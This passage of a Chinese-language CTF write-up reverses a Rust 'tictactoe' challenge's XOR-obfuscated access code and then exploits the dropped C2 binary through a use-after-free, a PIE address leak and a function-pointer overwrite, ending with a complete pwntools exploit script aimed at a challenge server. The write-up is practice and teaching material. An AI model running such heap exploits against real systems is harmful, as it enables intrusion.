.rodata:000000000007ADCE                 db  3Bh ; ;
15
.rodata:000000000007ADCF                 db  6Dh ; m
16
.rodata:000000000007ADD0                 db  6Bh ; k
17
.rodata:000000000007ADD1                 db  39h ; 9
18
.rodata:000000000007ADD2                 db  6Dh ; m
19
.rodata:000000000007ADD3 ; tictactoe::ENC_PART3
20
.rodata:000000000007ADD3 _ZN9tictactoe9ENC_PART317ha3eec3bbd5f1dfdbE db 6Eh
21
.rodata:000000000007ADD3                                         ; DATA XREF: tictactoe::decrypt_key:loc_12DDF1↓o
22
.rodata:000000000007ADD4                 db  39h ; 9
23
.rodata:000000000007ADD5                 db  6Dh ; m
24
.rodata:000000000007ADD6                 db  6Ah ; j
25
.rodata:000000000007ADD7                 db  69h ; i
26
.rodata:000000000007ADD8                 db  3Dh ; =
27
.rodata:000000000007ADD9                 db  3Bh ; ;
28
.rodata:000000000007ADDA                 db  37h ; 7
29
.rodata:000000000007ADDB                 db  69h ; i

分别对每一部分进行 core::iter::traits::iterator::Iterator::map 操作，然后 core::iter::traits::iterator::Iterator::collect 取操作后的结果。之后 core::fmt::rt::Argument::new_display 将这三部分分别转换为可打印值，一般用于格式化字符串。不过这里通过 v13 数组将这些值拼到一块。core::fmt::Arguments::new_v1 用于将合并后的值转换为格式化参数，用于 alloc::fmt::format。最后将结果放到 a1 数组中返回。

回想一下之前学过的一点 rust 语法，map 内部一般都会有一个闭包（函数），用于对迭代器中的每一个元素进行一些操作。看函数窗口，我们发现 tictactoe::decrypt_key::{{closure}} 函数，显然，这就是闭包了。

一共有三个，每一个都一样：

1
__int64 __fastcall tictactoe::decrypt_key::{{closure}}(__int64 a1, _BYTE *a2)
2
{
3
  return *a2 ^ 0x5Au;
4
}

闭包对每一个元素进行 ^ 0x5Au 的操作。即对三个 ENC_PART 的每一个元素都进行这样的异或。那我们只要手动提取出完整的 ENC_PART，然后对每一个 byte 都进行这样的异或，就得到了 Access Code.

终于，我们得到了 /tmp/C2_executable，但是这个程序并没有直接提供 shell 或者查看 flag 的功能，我们还得继续分析，把它 pwn 掉。好一个一波三折……

好在，生成的 C2 程序不再是 Rust 写的了……

1
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
2
{
3
  setvbuf(stdout, 0LL, 2, 0LL);
4
  for ( agent = malloc(0x10uLL); ; executeAction(agent) )
5
  {
6
    displayMenu();
7
    processInput();
8
  }
9
}

1
__int64 __fastcall executeAction(__int64 (**a1)(void))
2
{
3
  return (*a1)();
4
}

如上，for 循环中先 malloc 了 0x10 的大小，将得到的地址给到 agent。当一轮循环结束后就会去执行 executeAction，这个函数将传入的 agent 转换为 __int64 (**a1)(void)，即一个指向返回 __int64 的无参数函数指针的指针。调用这个函数，会将 (*a1)() 作为返回，即解引用这个二级指针，得到函数指针，并将其作为函数执行。

我们注意到函数列表中有这样一个后门函数：

1
unsigned __int64 getSecret()
2
{
3
  FILE *stream; // [rsp+8h] [rbp-D8h]
4
  char s[200]; // [rsp+10h] [rbp-D0h] BYREF
5
  unsigned __int64 v3; // [rsp+D8h] [rbp-8h]
6

7
  v3 = __readfsqword(0x28u);
8
  stream = fopen("flag.txt", "r");
9
  if ( stream )
10
  {
11
    fgets(s, 200, stream);
12
    fprintf(stdout, "%s\n", s);
13
    fclose(stream);
14
  }
15
  else
16
  {
17
    perror("couldn't open flag.txt");
18
  }
19
  return v3 - __readfsqword(0x28u);
20
}

那么思路就很清楚了，想办法让 agent 的值等于 getSecret 的地址即可。

继续看菜单选项函数：

1
int processInput()
2
{
3
  __int64 UserInput; // rax
4
  _QWORD *v1; // rbx
5

6
  __isoc99_scanf(" %c", option);
7
  option[0] = toupper(option[0]);
8
  switch ( option[0] )
9
  {
10
    case 'A':
11
      LODWORD(UserInput) = (_DWORD)agent;
12
      *agent = beginoperation;
13
      break;
14
    case 'C':
15
      *agent = createAccount;
16
      puts("===========================");
17
      puts("Registration Form : ");
18
      puts("Enter your username: ");
19
      v1 = agent;
20
      UserInput = getUserInput();
21
      v1[1] = UserInput;
22
      break;
23
    case 'E':
24
      LODWORD(UserInput) = (_DWORD)agent;
25
      *agent = exitProgram;
26
      break;
27
    case 'F':
28
      LODWORD(UserInput) = Hackupdate();
29
      break;
30
    case 'H':
31
      if ( agent )
32
      {
33
        LODWORD(UserInput) = (_DWORD)agent;
34
        *agent = printID;
35
      }
36
      else
37
      {
38
        LODWORD(UserInput) = puts("Not logged in!");
39
      }
40
      break;
41
    case 'K':
42
      LODWORD(UserInput) = (_DWORD)agent;
43
      *agent = Checkstatus;
44
      break;
45
    default:
46
      puts("Invalid option!");
47
      exit(1);
48
  }
49
  return UserInput;
50
}

每个对应选项都会将 agent 的值设置为对应选项要执行的函数的地址。

其中 E 选项会将 agent 设置为 exitProgram：

1
unsigned __int64 exitProgram()
2
{
3
  char v1; // [rsp+7h] [rbp-9h] BYREF
4
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]
5

6
  v2 = __readfsqword(0x28u);
7
  printf("Sure you want to leave the clan (Y/N)? ");
8
  __isoc99_scanf(" %c", &v1);
9
  if ( toupper(v1) == 89 )
10
  {
11
    puts("Congrats on quitting the revolution");
12
    free(agent);
13
  }
14
  else
15
  {
16
    puts("Ok.");
17
  }
18
  return v2 - __readfsqword(0x28u);
19
}

我们看到它将 agent 释放了，这样我们下次分配同样大小空间的时候就会复用原先 agent 的地址，如果我们复用地址后还能对其进行写入，那就可以将其改成 getSecret 的地址了。

那么我们现在需要的就是找到这样一个 malloc，它将获取 0x10 的空间，我们发现 F 中的 Hackupdate 函数是：

1
ssize_t Hackupdate()
2
{
3
  void *buf; // [rsp+8h] [rbp-8h]
4

5
  puts("How did your previous hack go? ");
6
  buf = malloc(8uLL);
7
  return read(0, buf, 8uLL);
8
}

malloc 了 0x8 字节，加上 metadata 再对齐一下，和 malloc(0x10); 分配的大小应该是一样的，这样一来就成功复用了 agent 的地址，并且，紧接着它会调用 read 向这个地址写入数据。

现在我们只差临门一脚了。由于这个程序开启了 PIE 保护，所以我们得想办法泄漏程序基地址才能计算出 getSecret 的物理地址。

我们发现使用 H 选项会输出一个地址，而这个地址看上去很像程序内部的指令地址：

1
Command and Control Centere.
2
==========================
3
(H) Generate ID for the agent
4
(A) Begin a new cyber operation
5
(C) Create a new Agent
6
(K) Check status of current cyber operation
7
(F) Provide updates about your current hack.)
8
(E) Exit
9
> H
10
User ID: 0x5609404d243c

看其对应的反编译代码，调用了 generateUserID，然后通过 printf 输出返回值：

1
int printID()
2
{
3
  return printf("User ID: %p\n", generateUserID);
4
}

1
char *generateUserID()
2
{
3
  int v0; // eax
4
  unsigned int i; // [rsp+4h] [rbp-Ch]
5
  FILE *stream; // [rsp+8h] [rbp-8h]
6

7
  if ( !initialized_1 )
8
  {
9
    memset(userid_0, 48, sizeof(userid_0));
10
    stream = fopen("/dev/urandom", "rb");
11
    if ( stream )
12
    {
13
      for ( i = 0; i <= 0x1F; i += 2 )
14
      {
15
        v0 = fgetc(stream);
16
        sprintf(&userid_0[i], "%02hhx", v0);
17
      }
18
      fclose(stream);
19
    }
20
    initialized_1 = 1;
21
  }
22
  return userid_0;
23
}

generateUserID 会从 /dev/urandom 读取 0x10 字节数据到 userid_0 数组中，并将 userid_0 的地址作为 64-bit 指针返回。

值得注意的是，我们不关心从 /dev/urandom 里面读到的垃圾数据，generateUserID 返回的是 userid_0 在程序中的地址，而非从 /dev/urandom 里读到的值。并且 printf 使用的是 %p 格式化字符，而非 %s，所以最终打印的是 userid_0 在程序中的地址。虽然它属于 .bss 段，但是开启 PIE 会随机化整个程序的加载地址，故通过这个地址减去它和 PIE 基址之间的偏移，就得到了实际 PIE 基地址。

下面就可以愉快地编写 exploit 了。

呼呼呼，总算写完了……从早上一起来就开始分析这道题，逆向 rust 程序部分大概花了我三小时（其中有一个多小时都是在浪费时间……），逆完拿到 C2 后，一看尼玛怎么是 heap exploitation，不会啊！只觉一阵无力感瞬间袭上心头，flag 近在眼前，我明明已经解决了整个 challenge 中最困难的逆向部分，却倒在了这个看上去不怎么难的堆利用上……洗洗睡了，睡了三小时，半个下午都在无梦中度过……起来发了几句牢骚，又继续研究这个 C2。凭借着脑海中那一点点可怜的 heap exploitation 知识，试图把它突突。结果没想到起来后研究了四十分钟解决了……不算难，甚至可以说很简单……一开始以为漏洞点在 getUserInput 中，浪费了一半多的时间……

最后，这应该是我分析过的最复杂的一个程序，虽然感觉完全就是在做 forensics，pwn 的部分占比有点太小了. 当然，Yan85 VM 分析起来也不比它容易多少，不过这个 challenge 毕竟是 rust 写的，也是我第一次逆向 rust 程序。果然，rust 不用 unsafe 还是很难写出有漏洞的代码的，除非是逻辑漏洞。所以总的来说做完感觉并不是那么牛逼，反而觉得简直不要太简单，但期间还是走了不少弯路，浪费了太多时间，也是难免的……

老实说，在逆向分析的时候，我就是一路猜猜猜，凭借着直觉拿到的 C2，而不是实际的逆向分析能力。但是，实力决定下限，直觉决定上限，实力也是直觉的基础。我觉得有这样敏锐的直觉对于比赛中快速解题还是有很大帮助的，不过有时候直觉容易与事实混淆，可能导致自己掉到坑里困上好几个小时也说不准。总之，应该同时培养逆向分析的硬实力和像直觉这样的软实力，知道什么时候应该深入分析代码，什么时候应该跟着直觉走。

Exploit#

1
#!/usr/bin/env python3
2

3
from pwn import (
4
    ELF,
5
    args,
6
    context,
7
    flat,
8
    process,
9
    raw_input,
10
    remote,
11
)
12

13
FILE = "./tictactoe"
14
HOST, PORT = "94.237.48.12", 35762
15

16
context(log_level="debug", binary=FILE, terminal="kitty")
17

18
elf = context.binary
19

20

21
def launch():
22
    if args.L:
23
        target = process(FILE)
24
    else:
25
        target = remote(HOST, PORT)
26
    return target
27

28

29
def decrypt(encrypted):
30
    return bytes(byte ^ 0x5A for byte in encrypted)
31

32

33
def main():
34
    target = launch()
35

36
    target.sendlineafter(b": ", b"0 0")
37
    target.sendlineafter(b": ", b"0 4")
38
    target.sendlineafter(b": ", b"1 1")
39
    target.sendlineafter(b": ", b"1 3")
40
    target.sendlineafter(b": ", b"2 2")
41
    target.sendlineafter(b": ", b"3 1")
42
    target.sendlineafter(b": ", b"3 3")
43
    target.sendlineafter(b": ", b"4 0")
44
    target.sendlineafter(b": ", b"4 4")
45
    target.sendlineafter(b": ", b"cub3y0nd")
46

47
    plaintext = decrypt(b"\x1ei<k4i.6#;mk9mn9mji=;7i")
48
    target.sendlineafter(b": ", plaintext)
49

50
    raw_input("DEBUG")
51
    elf = ELF("/tmp/C2_executable")
52

53
    target.sendlineafter(b"> ", b"H")
54
    target.recvuntil(b"ID: ")
55

56
    piebase = int(target.recvline(), 16) - 0x143C
57

58
    target.sendlineafter(b"> ", b"E")
59
    target.sendlineafter(b"? ", b"Y")
60
    target.sendlineafter(b"> ", b"F")
61

62
    payload = flat(piebase + elf.sym["getSecret"], 0)
63
    target.sendlineafter(b"?", payload)
64

65
    target.interactive()
66

67

68
if __name__ == "__main__":
69
    main()